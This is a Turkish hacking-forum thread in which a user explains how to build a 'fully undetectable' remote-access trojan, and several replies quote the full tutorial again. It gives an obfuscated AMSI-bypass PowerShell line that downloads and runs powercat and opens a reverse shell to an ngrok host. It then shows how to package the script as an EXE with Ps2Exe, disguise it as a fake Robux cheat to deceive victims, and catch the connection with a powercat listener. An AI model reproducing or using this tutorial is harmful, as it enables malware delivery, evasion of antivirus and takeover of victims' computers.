Kullanıcıların Dikkatine!

Konularda yapılan kısaltmalı ve geçiştirilmiş mesajlar (adsadas, haha, sjsksjsdjks, asdsd, nokta, random, sayı vb.) yasaklanma sebebidir. Mağduriyet yaşanmaması için bu duruma dikkat etmelisiniz.

Daha Fazlası

Hacktivizm Online

Hacktivizm sitesi hack kültürünü benimsemiş kişiler tarafından 2020 yılında kuruldu. Kuruluş amacı Türkiye'nin en büyük hack forumu olmak ve bilgi alışverişinde bulunmaktır.

Daha Fazlası

Konu Açarken Dikkat Edilmesi Gerekenler

Forumda oluşan / oluşması öngörülen görüntü kirliliğine engel olmak ve başlıkların daha temiz dil ile açılması amacıyla kurallarımıza bazı bağımlı / bağımsız maddeler eklemek durumundayız.

Daha Fazlası

FULL FUDLU RAT NASIL YAPILIR AÇIKLIYORUM BY AZAZEL

azazel22

Kayıtlı Üye
Katılım
15 Ocak 2024
Mesajlar
53
Tepkime puanı
17
Konum
adana
İlgi Alanlarınız
Siber Güvenlik
Pentest
C Dilleri Python Html Css Js
Cinsiyet
  1. Erkek
merhaba forum üyeleri

kriptografi gerektirmeyecek kolay bir şekilde %90 fud nasıl yapılır analatacağım. (sadece çok kullanılmayan bazi 1 2 antivirüse takılıyor)


1. Ngrok sitesinden dosyayı indirip icindeki ngrok adlı dosyayı da masaüstüne atıyorsunuz


2. Ngrok sitesinde ki authtoken bölümünden auth tokenimizi alıp


3. Terminalimizde masaüstüne geilyoruz ve başına ./ ekleyerek yapıştırıp enterlıyoruz.


Artık Ngrok Hazır!

Sırada bir bağlantı açmak var.

4. "./ngrok tcp 8000" komutunu girip bir bağlantı açıyoruz.

5. Bu ekrandaki tek işimize yarayacak olan yer forwardingin karşısındaki (ssdeki kırmızı olarak karaladığım yer) tcp://0.tcp.eu.ngrok.io:00000 kısmıdır. Tabii sizde sıfır yazmıcak


Buradaki isteğim sizden tcp:// hariç 0.tcp.eu.ngrok.io kısmını alıp ngrok_host olarak kullanmanız. çift noktadan sonraki 5 basamaklı sayıyıda ngrok_portta kullanmanızdan yöne olur. (çift nokta dahil değil ve ngrok port host nedir diye sormayın altta ona da değineceğim.)

6. Burdan sonrası basit zaten. bir txt dosyası oluşturup alttaki uzun kodu tümüyle kopyalaıp oraya yapıştırın.
ve bu koddaki yani amsibypass base64 kodundaki bazı belli başlı yerleri değiştireceğiz

Amsibypass kodu:
[Ref].Assembly.GetType('Sys'+'te'+'m.Ma'+'na'+'g'+'em'+'ent.Au'+'tom'+'ati'+'on.'+$([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('QQ'+'B'+'tA'+'HM'+'Aa'+'Q'+'BV'+'AH'+'Q'+'Aa'+'QBs'+'AH'+'MA')))).GetField($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('YQ'+'BtA'+'HM'+'A'+'aQB'+'J'+'AG4'+'AaQB'+'0A'+'EYAY'+'Q'+'BpA'+'GwAZ'+'QBk'+'AA=='))),'NonPublic,Static').SetValue($null,$true);IEX (New-Object System.Net.Webclient).DownloadString('https://raw.githubusercontent.com/besimorhino/powercat/master/powercat.ps1');powercat -c ngrok_host -p ngrok_port -e cmd

Bu kodda sadece ngrok_ip ve ngrok_portu silip değiştirip ngrok bağlantısında ki o anlattığım ip ve portu gireceksin.
sonra da txt uzantısını ps1 yapacağız. çünkü bu bir powershell kodu

ŞU ANDA ZARARLIMIZ HAZIR! FAKAT;
kimse resmen "ben bir zararlıyım!" diye bağıran yapıdaki bir dosyayı açmaz ne kadar uyarı vs vermiyecek olsa da O YÜZDEN NE YAPACAĞIZ? BU DOSYAYI EXE YAPACAĞIZ.

6. Ps1 dosyalarını exeye dönüştürmemize yarayan bir program var ismi Ps2Exe
allah var çok güzel uygulama


kullanımı çok basit zaten o copyright sürüm vs yerlere sallayın bişiler ama onların bir altındaki tikli kutulardaki ilk tiki kaldırmanız gerekli!


bir exe dosyasıyla (mesela çalışmadığını bildiğiniz gui arayüzlü robux hilesi exe ya da kendinizde de 1 saat falan uğraşarak dandik bişi yapabilirsiniz) bir exeyle birleştirip inandırıcılığı bir üst seviyeye taşıyabilirsiniz.

7. Bağlantı almak için powercat kullanacağız
linux sistemler için "apt install powercat" yeterli olacaktır

bağlantıyı almakta dikkat etmeniz gereken bir husus var.
o da ngrok bağlantısını açarken port olarak ne kullanmışız?
komutumuz "./ngrok tcp 8000" yani bizim 8000 portunu dinlemeye almamız lazım.

bu durumda kullanacağımız komut
"powercat -l -p 8000 "

ama şöyle bir durum var eğer ki sürekli log bekleyip logun ne zaman düşeceğinden emin değilseniz sürekli açık kalmasını istiyorsanız
"powercat -l -p 8000 -rep"
kullanımı daha uygun olur. rep komutuyla birlikte zaman aşımı derdini ortadan kaldırırsınız.

İŞTE SONUÇ
:)





derseniz ki bize grabber stealer tarzı bişiler lazım o zamanda bu yapılan trojan sayesinde özel kodlar kullanarak defenderi bypasslayıp ne kadar boktan fudu olan bir grabber stealer olursa olsun sisteme sokup tüm hesap ve bilgi loglarını almayı da gösterebilirim. Tabii eğer ki güzel bir tepki gelirse.

aynı zamanda bir oyun hilesi ya da herhangi bir exeye bu yaptığımız exeyi nasıl gizleyebiliriz gibi konuları da çok tepki gelirse anlatmak isterim.

kriptografi bilmeden en fazla bu kadar fudlayabilirsiniz. (ücretli ya da cracklenip sunulan fudlama programları hariç tabii ki)

İYİ RATLAMALAR :*
 

GARANTİRAT

Kayıtlı Üye
Katılım
29 Eylül 2023
Mesajlar
12
Tepkime puanı
1
Konum
Yok
İlgi Alanlarınız
Yok
Cinsiyet
  1. Erkek
merhaba forum üyeleri

kriptografi gerektirmeyecek kolay bir şekilde %90 fud nasıl yapılır analatacağım. (sadece çok kullanılmayan bazi 1 2 antivirüse takılıyor)


1. Ngrok sitesinden dosyayı indirip icindeki ngrok adlı dosyayı da masaüstüne atıyorsunuz


2. Ngrok sitesinde ki authtoken bölümünden auth tokenimizi alıp


3. Terminalimizde masaüstüne geilyoruz ve başına ./ ekleyerek yapıştırıp enterlıyoruz.


Artık Ngrok Hazır!

Sırada bir bağlantı açmak var.

4. "./ngrok tcp 8000" komutunu girip bir bağlantı açıyoruz.

5. Bu ekrandaki tek işimize yarayacak olan yer forwardingin karşısındaki (ssdeki kırmızı olarak karaladığım yer) tcp://0.tcp.eu.ngrok.io:00000 kısmıdır. Tabii sizde sıfır yazmıcak


Buradaki isteğim sizden tcp:// hariç 0.tcp.eu.ngrok.io kısmını alıp ngrok_host olarak kullanmanız. çift noktadan sonraki 5 basamaklı sayıyıda ngrok_portta kullanmanızdan yöne olur. (çift nokta dahil değil ve ngrok port host nedir diye sormayın altta ona da değineceğim.)

6. Burdan sonrası basit zaten. bir txt dosyası oluşturup alttaki uzun kodu tümüyle kopyalaıp oraya yapıştırın.
ve bu koddaki yani amsibypass base64 kodundaki bazı belli başlı yerleri değiştireceğiz

Amsibypass kodu:
[Ref].Assembly.GetType('Sys'+'te'+'m.Ma'+'na'+'g'+'em'+'ent.Au'+'tom'+'ati'+'on.'+$([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('QQ'+'B'+'tA'+'HM'+'Aa'+'Q'+'BV'+'AH'+'Q'+'Aa'+'QBs'+'AH'+'MA')))).GetField($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('YQ'+'BtA'+'HM'+'A'+'aQB'+'J'+'AG4'+'AaQB'+'0A'+'EYAY'+'Q'+'BpA'+'GwAZ'+'QBk'+'AA=='))),'NonPublic,Static').SetValue($null,$true);IEX (New-Object System.Net.Webclient).DownloadString('https://raw.githubusercontent.com/besimorhino/powercat/master/powercat.ps1');powercat -c ngrok_host -p ngrok_port -e cmd

Bu kodda sadece ngrok_ip ve ngrok_portu silip değiştirip ngrok bağlantısında ki o anlattığım ip ve portu gireceksin.
sonra da txt uzantısını ps1 yapacağız. çünkü bu bir powershell kodu

ŞU ANDA ZARARLIMIZ HAZIR! FAKAT;
kimse resmen "ben bir zararlıyım!" diye bağıran yapıdaki bir dosyayı açmaz ne kadar uyarı vs vermiyecek olsa da O YÜZDEN NE YAPACAĞIZ? BU DOSYAYI EXE YAPACAĞIZ.

6. Ps1 dosyalarını exeye dönüştürmemize yarayan bir program var ismi Ps2Exe
allah var çok güzel uygulama


kullanımı çok basit zaten o copyright sürüm vs yerlere sallayın bişiler ama onların bir altındaki tikli kutulardaki ilk tiki kaldırmanız gerekli!


bir exe dosyasıyla (mesela çalışmadığını bildiğiniz gui arayüzlü robux hilesi exe ya da kendinizde de 1 saat falan uğraşarak dandik bişi yapabilirsiniz) bir exeyle birleştirip inandırıcılığı bir üst seviyeye taşıyabilirsiniz.

7. Bağlantı almak için powercat kullanacağız
linux sistemler için "apt install powercat" yeterli olacaktır

bağlantıyı almakta dikkat etmeniz gereken bir husus var.
o da ngrok bağlantısını açarken port olarak ne kullanmışız?
komutumuz "./ngrok tcp 8000" yani bizim 8000 portunu dinlemeye almamız lazım.

bu durumda kullanacağımız komut
"powercat -l -p 8000 "

ama şöyle bir durum var eğer ki sürekli log bekleyip logun ne zaman düşeceğinden emin değilseniz sürekli açık kalmasını istiyorsanız
"powercat -l -p 8000 -rep"
kullanımı daha uygun olur. rep komutuyla birlikte zaman aşımı derdini ortadan kaldırırsınız.

İŞTE SONUÇ
:)





derseniz ki bize grabber stealer tarzı bişiler lazım o zamanda bu yapılan trojan sayesinde özel kodlar kullanarak defenderi bypasslayıp ne kadar boktan fudu olan bir grabber stealer olursa olsun sisteme sokup tüm hesap ve bilgi loglarını almayı da gösterebilirim. Tabii eğer ki güzel bir tepki gelirse.

aynı zamanda bir oyun hilesi ya da herhangi bir exeye bu yaptığımız exeyi nasıl gizleyebiliriz gibi konuları da çok tepki gelirse anlatmak isterim.

kriptografi bilmeden en fazla bu kadar fudlayabilirsiniz. (ücretli ya da cracklenip sunulan fudlama programları hariç tabii ki)

İYİ RATLAMALAR :*
*** Hidden text: cannot be quoted. ***
Es
 

breac

Kayıtlı Üye
Katılım
25 Ocak 2023
Mesajlar
84
Tepkime puanı
13
Konum
Türkiye
İlgi Alanlarınız
futbol
Cinsiyet
  1. Erkek
merhaba forum üyeleri

kriptografi gerektirmeyecek kolay bir şekilde %90 fud nasıl yapılır analatacağım. (sadece çok kullanılmayan bazi 1 2 antivirüse takılıyor)


1. Ngrok sitesinden dosyayı indirip icindeki ngrok adlı dosyayı da masaüstüne atıyorsunuz


2. Ngrok sitesinde ki authtoken bölümünden auth tokenimizi alıp


3. Terminalimizde masaüstüne geilyoruz ve başına ./ ekleyerek yapıştırıp enterlıyoruz.


Artık Ngrok Hazır!

Sırada bir bağlantı açmak var.

4. "./ngrok tcp 8000" komutunu girip bir bağlantı açıyoruz.

5. Bu ekrandaki tek işimize yarayacak olan yer forwardingin karşısındaki (ssdeki kırmızı olarak karaladığım yer) tcp://0.tcp.eu.ngrok.io:00000 kısmıdır. Tabii sizde sıfır yazmıcak


Buradaki isteğim sizden tcp:// hariç 0.tcp.eu.ngrok.io kısmını alıp ngrok_host olarak kullanmanız. çift noktadan sonraki 5 basamaklı sayıyıda ngrok_portta kullanmanızdan yöne olur. (çift nokta dahil değil ve ngrok port host nedir diye sormayın altta ona da değineceğim.)

6. Burdan sonrası basit zaten. bir txt dosyası oluşturup alttaki uzun kodu tümüyle kopyalaıp oraya yapıştırın.
ve bu koddaki yani amsibypass base64 kodundaki bazı belli başlı yerleri değiştireceğiz

Amsibypass kodu:
[Ref].Assembly.GetType('Sys'+'te'+'m.Ma'+'na'+'g'+'em'+'ent.Au'+'tom'+'ati'+'on.'+$([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('QQ'+'B'+'tA'+'HM'+'Aa'+'Q'+'BV'+'AH'+'Q'+'Aa'+'QBs'+'AH'+'MA')))).GetField($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('YQ'+'BtA'+'HM'+'A'+'aQB'+'J'+'AG4'+'AaQB'+'0A'+'EYAY'+'Q'+'BpA'+'GwAZ'+'QBk'+'AA=='))),'NonPublic,Static').SetValue($null,$true);IEX (New-Object System.Net.Webclient).DownloadString('https://raw.githubusercontent.com/besimorhino/powercat/master/powercat.ps1');powercat -c ngrok_host -p ngrok_port -e cmd

Bu kodda sadece ngrok_ip ve ngrok_portu silip değiştirip ngrok bağlantısında ki o anlattığım ip ve portu gireceksin.
sonra da txt uzantısını ps1 yapacağız. çünkü bu bir powershell kodu

ŞU ANDA ZARARLIMIZ HAZIR! FAKAT;
kimse resmen "ben bir zararlıyım!" diye bağıran yapıdaki bir dosyayı açmaz ne kadar uyarı vs vermiyecek olsa da O YÜZDEN NE YAPACAĞIZ? BU DOSYAYI EXE YAPACAĞIZ.

6. Ps1 dosyalarını exeye dönüştürmemize yarayan bir program var ismi Ps2Exe
allah var çok güzel uygulama


kullanımı çok basit zaten o copyright sürüm vs yerlere sallayın bişiler ama onların bir altındaki tikli kutulardaki ilk tiki kaldırmanız gerekli!


bir exe dosyasıyla (mesela çalışmadığını bildiğiniz gui arayüzlü robux hilesi exe ya da kendinizde de 1 saat falan uğraşarak dandik bişi yapabilirsiniz) bir exeyle birleştirip inandırıcılığı bir üst seviyeye taşıyabilirsiniz.

7. Bağlantı almak için powercat kullanacağız
linux sistemler için "apt install powercat" yeterli olacaktır

bağlantıyı almakta dikkat etmeniz gereken bir husus var.
o da ngrok bağlantısını açarken port olarak ne kullanmışız?
komutumuz "./ngrok tcp 8000" yani bizim 8000 portunu dinlemeye almamız lazım.

bu durumda kullanacağımız komut
"powercat -l -p 8000 "

ama şöyle bir durum var eğer ki sürekli log bekleyip logun ne zaman düşeceğinden emin değilseniz sürekli açık kalmasını istiyorsanız
"powercat -l -p 8000 -rep"
kullanımı daha uygun olur. rep komutuyla birlikte zaman aşımı derdini ortadan kaldırırsınız.

İŞTE SONUÇ
:)





derseniz ki bize grabber stealer tarzı bişiler lazım o zamanda bu yapılan trojan sayesinde özel kodlar kullanarak defenderi bypasslayıp ne kadar boktan fudu olan bir grabber stealer olursa olsun sisteme sokup tüm hesap ve bilgi loglarını almayı da gösterebilirim. Tabii eğer ki güzel bir tepki gelirse.

aynı zamanda bir oyun hilesi ya da herhangi bir exeye bu yaptığımız exeyi nasıl gizleyebiliriz gibi konuları da çok tepki gelirse anlatmak isterim.

kriptografi bilmeden en fazla bu kadar fudlayabilirsiniz. (ücretli ya da cracklenip sunulan fudlama programları hariç tabii ki)

İYİ RATLAMALAR :*
*** Hidden text: cannot be quoted. ***
eyw
 

azazel22

Kayıtlı Üye
Katılım
15 Ocak 2024
Mesajlar
53
Tepkime puanı
17
Konum
adana
İlgi Alanlarınız
Siber Güvenlik
Pentest
C Dilleri Python Html Css Js
Cinsiyet
  1. Erkek
hocam farklı bir forumdan direk çalıntı gibi olmuş ama biraz genede eline sağlık
bizzat dostum kendisi kim olduğunu iyi biliyorum merak etme gidip bizzat ona sorabilirsin izin alarak paylaşıyorum
 

karaa

Kayıtlı Üye
Katılım
25 Ekim 2023
Mesajlar
73
Tepkime puanı
4
Konum
İzmir
İlgi Alanlarınız
Sosyal medya
Cinsiyet
  1. Erkek
merhaba forum üyeleri

kriptografi gerektirmeyecek kolay bir şekilde %90 fud nasıl yapılır analatacağım. (sadece çok kullanılmayan bazi 1 2 antivirüse takılıyor)


1. Ngrok sitesinden dosyayı indirip icindeki ngrok adlı dosyayı da masaüstüne atıyorsunuz


2. Ngrok sitesinde ki authtoken bölümünden auth tokenimizi alıp


3. Terminalimizde masaüstüne geilyoruz ve başına ./ ekleyerek yapıştırıp enterlıyoruz.


Artık Ngrok Hazır!

Sırada bir bağlantı açmak var.

4. "./ngrok tcp 8000" komutunu girip bir bağlantı açıyoruz.

5. Bu ekrandaki tek işimize yarayacak olan yer forwardingin karşısındaki (ssdeki kırmızı olarak karaladığım yer) tcp://0.tcp.eu.ngrok.io:00000 kısmıdır. Tabii sizde sıfır yazmıcak


Buradaki isteğim sizden tcp:// hariç 0.tcp.eu.ngrok.io kısmını alıp ngrok_host olarak kullanmanız. çift noktadan sonraki 5 basamaklı sayıyıda ngrok_portta kullanmanızdan yöne olur. (çift nokta dahil değil ve ngrok port host nedir diye sormayın altta ona da değineceğim.)

6. Burdan sonrası basit zaten. bir txt dosyası oluşturup alttaki uzun kodu tümüyle kopyalaıp oraya yapıştırın.
ve bu koddaki yani amsibypass base64 kodundaki bazı belli başlı yerleri değiştireceğiz

Amsibypass kodu:
[Ref].Assembly.GetType('Sys'+'te'+'m.Ma'+'na'+'g'+'em'+'ent.Au'+'tom'+'ati'+'on.'+$([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('QQ'+'B'+'tA'+'HM'+'Aa'+'Q'+'BV'+'AH'+'Q'+'Aa'+'QBs'+'AH'+'MA')))).GetField($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('YQ'+'BtA'+'HM'+'A'+'aQB'+'J'+'AG4'+'AaQB'+'0A'+'EYAY'+'Q'+'BpA'+'GwAZ'+'QBk'+'AA=='))),'NonPublic,Static').SetValue($null,$true);IEX (New-Object System.Net.Webclient).DownloadString('https://raw.githubusercontent.com/besimorhino/powercat/master/powercat.ps1');powercat -c ngrok_host -p ngrok_port -e cmd

Bu kodda sadece ngrok_ip ve ngrok_portu silip değiştirip ngrok bağlantısında ki o anlattığım ip ve portu gireceksin.
sonra da txt uzantısını ps1 yapacağız. çünkü bu bir powershell kodu

ŞU ANDA ZARARLIMIZ HAZIR! FAKAT;
kimse resmen "ben bir zararlıyım!" diye bağıran yapıdaki bir dosyayı açmaz ne kadar uyarı vs vermiyecek olsa da O YÜZDEN NE YAPACAĞIZ? BU DOSYAYI EXE YAPACAĞIZ.

6. Ps1 dosyalarını exeye dönüştürmemize yarayan bir program var ismi Ps2Exe
allah var çok güzel uygulama


kullanımı çok basit zaten o copyright sürüm vs yerlere sallayın bişiler ama onların bir altındaki tikli kutulardaki ilk tiki kaldırmanız gerekli!


bir exe dosyasıyla (mesela çalışmadığını bildiğiniz gui arayüzlü robux hilesi exe ya da kendinizde de 1 saat falan uğraşarak dandik bişi yapabilirsiniz) bir exeyle birleştirip inandırıcılığı bir üst seviyeye taşıyabilirsiniz.

7. Bağlantı almak için powercat kullanacağız
linux sistemler için "apt install powercat" yeterli olacaktır

bağlantıyı almakta dikkat etmeniz gereken bir husus var.
o da ngrok bağlantısını açarken port olarak ne kullanmışız?
komutumuz "./ngrok tcp 8000" yani bizim 8000 portunu dinlemeye almamız lazım.

bu durumda kullanacağımız komut
"powercat -l -p 8000 "

ama şöyle bir durum var eğer ki sürekli log bekleyip logun ne zaman düşeceğinden emin değilseniz sürekli açık kalmasını istiyorsanız
"powercat -l -p 8000 -rep"
kullanımı daha uygun olur. rep komutuyla birlikte zaman aşımı derdini ortadan kaldırırsınız.

İŞTE SONUÇ
:)





derseniz ki bize grabber stealer tarzı bişiler lazım o zamanda bu yapılan trojan sayesinde özel kodlar kullanarak defenderi bypasslayıp ne kadar boktan fudu olan bir grabber stealer olursa olsun sisteme sokup tüm hesap ve bilgi loglarını almayı da gösterebilirim. Tabii eğer ki güzel bir tepki gelirse.

aynı zamanda bir oyun hilesi ya da herhangi bir exeye bu yaptığımız exeyi nasıl gizleyebiliriz gibi konuları da çok tepki gelirse anlatmak isterim.

kriptografi bilmeden en fazla bu kadar fudlayabilirsiniz. (ücretli ya da cracklenip sunulan fudlama programları hariç tabii ki)

İYİ RATLAMALAR :*
*** Hidden text: cannot be quoted. ***
Es
 

Glisay

Kayıtlı Üye
Katılım
27 Mart 2023
Mesajlar
25
Tepkime puanı
4
Konum
sa
İlgi Alanlarınız
Basket
Cinsiyet
  1. Erkek
merhaba forum üyeleri

kriptografi gerektirmeyecek kolay bir şekilde %90 fud nasıl yapılır analatacağım. (sadece çok kullanılmayan bazi 1 2 antivirüse takılıyor)


1. Ngrok sitesinden dosyayı indirip icindeki ngrok adlı dosyayı da masaüstüne atıyorsunuz


2. Ngrok sitesinde ki authtoken bölümünden auth tokenimizi alıp


3. Terminalimizde masaüstüne geilyoruz ve başına ./ ekleyerek yapıştırıp enterlıyoruz.


Artık Ngrok Hazır!

Sırada bir bağlantı açmak var.

4. "./ngrok tcp 8000" komutunu girip bir bağlantı açıyoruz.

5. Bu ekrandaki tek işimize yarayacak olan yer forwardingin karşısındaki (ssdeki kırmızı olarak karaladığım yer) tcp://0.tcp.eu.ngrok.io:00000 kısmıdır. Tabii sizde sıfır yazmıcak


Buradaki isteğim sizden tcp:// hariç 0.tcp.eu.ngrok.io kısmını alıp ngrok_host olarak kullanmanız. çift noktadan sonraki 5 basamaklı sayıyıda ngrok_portta kullanmanızdan yöne olur. (çift nokta dahil değil ve ngrok port host nedir diye sormayın altta ona da değineceğim.)

6. Burdan sonrası basit zaten. bir txt dosyası oluşturup alttaki uzun kodu tümüyle kopyalaıp oraya yapıştırın.
ve bu koddaki yani amsibypass base64 kodundaki bazı belli başlı yerleri değiştireceğiz

Amsibypass kodu:
[Ref].Assembly.GetType('Sys'+'te'+'m.Ma'+'na'+'g'+'em'+'ent.Au'+'tom'+'ati'+'on.'+$([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('QQ'+'B'+'tA'+'HM'+'Aa'+'Q'+'BV'+'AH'+'Q'+'Aa'+'QBs'+'AH'+'MA')))).GetField($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('YQ'+'BtA'+'HM'+'A'+'aQB'+'J'+'AG4'+'AaQB'+'0A'+'EYAY'+'Q'+'BpA'+'GwAZ'+'QBk'+'AA=='))),'NonPublic,Static').SetValue($null,$true);IEX (New-Object System.Net.Webclient).DownloadString('https://raw.githubusercontent.com/besimorhino/powercat/master/powercat.ps1');powercat -c ngrok_host -p ngrok_port -e cmd

Bu kodda sadece ngrok_ip ve ngrok_portu silip değiştirip ngrok bağlantısında ki o anlattığım ip ve portu gireceksin.
sonra da txt uzantısını ps1 yapacağız. çünkü bu bir powershell kodu

ŞU ANDA ZARARLIMIZ HAZIR! FAKAT;
kimse resmen "ben bir zararlıyım!" diye bağıran yapıdaki bir dosyayı açmaz ne kadar uyarı vs vermiyecek olsa da O YÜZDEN NE YAPACAĞIZ? BU DOSYAYI EXE YAPACAĞIZ.

6. Ps1 dosyalarını exeye dönüştürmemize yarayan bir program var ismi Ps2Exe
allah var çok güzel uygulama


kullanımı çok basit zaten o copyright sürüm vs yerlere sallayın bişiler ama onların bir altındaki tikli kutulardaki ilk tiki kaldırmanız gerekli!


bir exe dosyasıyla (mesela çalışmadığını bildiğiniz gui arayüzlü robux hilesi exe ya da kendinizde de 1 saat falan uğraşarak dandik bişi yapabilirsiniz) bir exeyle birleştirip inandırıcılığı bir üst seviyeye taşıyabilirsiniz.

7. Bağlantı almak için powercat kullanacağız
linux sistemler için "apt install powercat" yeterli olacaktır

bağlantıyı almakta dikkat etmeniz gereken bir husus var.
o da ngrok bağlantısını açarken port olarak ne kullanmışız?
komutumuz "./ngrok tcp 8000" yani bizim 8000 portunu dinlemeye almamız lazım.

bu durumda kullanacağımız komut
"powercat -l -p 8000 "

ama şöyle bir durum var eğer ki sürekli log bekleyip logun ne zaman düşeceğinden emin değilseniz sürekli açık kalmasını istiyorsanız
"powercat -l -p 8000 -rep"
kullanımı daha uygun olur. rep komutuyla birlikte zaman aşımı derdini ortadan kaldırırsınız.

İŞTE SONUÇ
:)





derseniz ki bize grabber stealer tarzı bişiler lazım o zamanda bu yapılan trojan sayesinde özel kodlar kullanarak defenderi bypasslayıp ne kadar boktan fudu olan bir grabber stealer olursa olsun sisteme sokup tüm hesap ve bilgi loglarını almayı da gösterebilirim. Tabii eğer ki güzel bir tepki gelirse.

aynı zamanda bir oyun hilesi ya da herhangi bir exeye bu yaptığımız exeyi nasıl gizleyebiliriz gibi konuları da çok tepki gelirse anlatmak isterim.

kriptografi bilmeden en fazla bu kadar fudlayabilirsiniz. (ücretli ya da cracklenip sunulan fudlama programları hariç tabii ki)

İYİ RATLAMALAR :*
*** Hidden text: cannot be quoted. ***
eyw aslan kardeşim
 

Anonm

Kayıtlı Üye
Katılım
8 Şubat 2024
Mesajlar
20
Tepkime puanı
0
Konum
Ankara
İlgi Alanlarınız
Hack
Cinsiyet
  1. Erkek
merhaba forum üyeleri

kriptografi gerektirmeyecek kolay bir şekilde %90 fud nasıl yapılır analatacağım. (sadece çok kullanılmayan bazi 1 2 antivirüse takılıyor)


1. Ngrok sitesinden dosyayı indirip icindeki ngrok adlı dosyayı da masaüstüne atıyorsunuz


2. Ngrok sitesinde ki authtoken bölümünden auth tokenimizi alıp


3. Terminalimizde masaüstüne geilyoruz ve başına ./ ekleyerek yapıştırıp enterlıyoruz.


Artık Ngrok Hazır!

Sırada bir bağlantı açmak var.

4. "./ngrok tcp 8000" komutunu girip bir bağlantı açıyoruz.

5. Bu ekrandaki tek işimize yarayacak olan yer forwardingin karşısındaki (ssdeki kırmızı olarak karaladığım yer) tcp://0.tcp.eu.ngrok.io:00000 kısmıdır. Tabii sizde sıfır yazmıcak


Buradaki isteğim sizden tcp:// hariç 0.tcp.eu.ngrok.io kısmını alıp ngrok_host olarak kullanmanız. çift noktadan sonraki 5 basamaklı sayıyıda ngrok_portta kullanmanızdan yöne olur. (çift nokta dahil değil ve ngrok port host nedir diye sormayın altta ona da değineceğim.)

6. Burdan sonrası basit zaten. bir txt dosyası oluşturup alttaki uzun kodu tümüyle kopyalaıp oraya yapıştırın.
ve bu koddaki yani amsibypass base64 kodundaki bazı belli başlı yerleri değiştireceğiz

Amsibypass kodu:
[Ref].Assembly.GetType('Sys'+'te'+'m.Ma'+'na'+'g'+'em'+'ent.Au'+'tom'+'ati'+'on.'+$([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('QQ'+'B'+'tA'+'HM'+'Aa'+'Q'+'BV'+'AH'+'Q'+'Aa'+'QBs'+'AH'+'MA')))).GetField($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('YQ'+'BtA'+'HM'+'A'+'aQB'+'J'+'AG4'+'AaQB'+'0A'+'EYAY'+'Q'+'BpA'+'GwAZ'+'QBk'+'AA=='))),'NonPublic,Static').SetValue($null,$true);IEX (New-Object System.Net.Webclient).DownloadString('https://raw.githubusercontent.com/besimorhino/powercat/master/powercat.ps1');powercat -c ngrok_host -p ngrok_port -e cmd

Bu kodda sadece ngrok_ip ve ngrok_portu silip değiştirip ngrok bağlantısında ki o anlattığım ip ve portu gireceksin.
sonra da txt uzantısını ps1 yapacağız. çünkü bu bir powershell kodu

ŞU ANDA ZARARLIMIZ HAZIR! FAKAT;
kimse resmen "ben bir zararlıyım!" diye bağıran yapıdaki bir dosyayı açmaz ne kadar uyarı vs vermiyecek olsa da O YÜZDEN NE YAPACAĞIZ? BU DOSYAYI EXE YAPACAĞIZ.

6. Ps1 dosyalarını exeye dönüştürmemize yarayan bir program var ismi Ps2Exe
allah var çok güzel uygulama


kullanımı çok basit zaten o copyright sürüm vs yerlere sallayın bişiler ama onların bir altındaki tikli kutulardaki ilk tiki kaldırmanız gerekli!


bir exe dosyasıyla (mesela çalışmadığını bildiğiniz gui arayüzlü robux hilesi exe ya da kendinizde de 1 saat falan uğraşarak dandik bişi yapabilirsiniz) bir exeyle birleştirip inandırıcılığı bir üst seviyeye taşıyabilirsiniz.

7. Bağlantı almak için powercat kullanacağız
linux sistemler için "apt install powercat" yeterli olacaktır

bağlantıyı almakta dikkat etmeniz gereken bir husus var.
o da ngrok bağlantısını açarken port olarak ne kullanmışız?
komutumuz "./ngrok tcp 8000" yani bizim 8000 portunu dinlemeye almamız lazım.

bu durumda kullanacağımız komut
"powercat -l -p 8000 "

ama şöyle bir durum var eğer ki sürekli log bekleyip logun ne zaman düşeceğinden emin değilseniz sürekli açık kalmasını istiyorsanız
"powercat -l -p 8000 -rep"
kullanımı daha uygun olur. rep komutuyla birlikte zaman aşımı derdini ortadan kaldırırsınız.

İŞTE SONUÇ
:)





derseniz ki bize grabber stealer tarzı bişiler lazım o zamanda bu yapılan trojan sayesinde özel kodlar kullanarak defenderi bypasslayıp ne kadar boktan fudu olan bir grabber stealer olursa olsun sisteme sokup tüm hesap ve bilgi loglarını almayı da gösterebilirim. Tabii eğer ki güzel bir tepki gelirse.

aynı zamanda bir oyun hilesi ya da herhangi bir exeye bu yaptığımız exeyi nasıl gizleyebiliriz gibi konuları da çok tepki gelirse anlatmak isterim.

kriptografi bilmeden en fazla bu kadar fudlayabilirsiniz. (ücretli ya da cracklenip sunulan fudlama programları hariç tabii ki)

İYİ RATLAMALAR :*
*** Hidden text: cannot be quoted. ***
Güzel konu
 

jak4rr

Kayıtlı Üye
Katılım
18 Ocak 2024
Mesajlar
2,114
Tepkime puanı
3
Konum
Türkiye
İlgi Alanlarınız
bilgisayar korsanlığı, veri sızıntıları
Cinsiyet
  1. Erkek

cangr8

Kayıtlı Üye
Katılım
9 Şubat 2024
Mesajlar
70
Tepkime puanı
3
Konum
ankarqa
İlgi Alanlarınız
hack
Cinsiyet
  1. Erkek
merhaba forum üyeleri

kriptografi gerektirmeyecek kolay bir şekilde %90 fud nasıl yapılır analatacağım. (sadece çok kullanılmayan bazi 1 2 antivirüse takılıyor)


1. Ngrok sitesinden dosyayı indirip icindeki ngrok adlı dosyayı da masaüstüne atıyorsunuz


2. Ngrok sitesinde ki authtoken bölümünden auth tokenimizi alıp


3. Terminalimizde masaüstüne geilyoruz ve başına ./ ekleyerek yapıştırıp enterlıyoruz.


Artık Ngrok Hazır!

Sırada bir bağlantı açmak var.

4. "./ngrok tcp 8000" komutunu girip bir bağlantı açıyoruz.

5. Bu ekrandaki tek işimize yarayacak olan yer forwardingin karşısındaki (ssdeki kırmızı olarak karaladığım yer) tcp://0.tcp.eu.ngrok.io:00000 kısmıdır. Tabii sizde sıfır yazmıcak


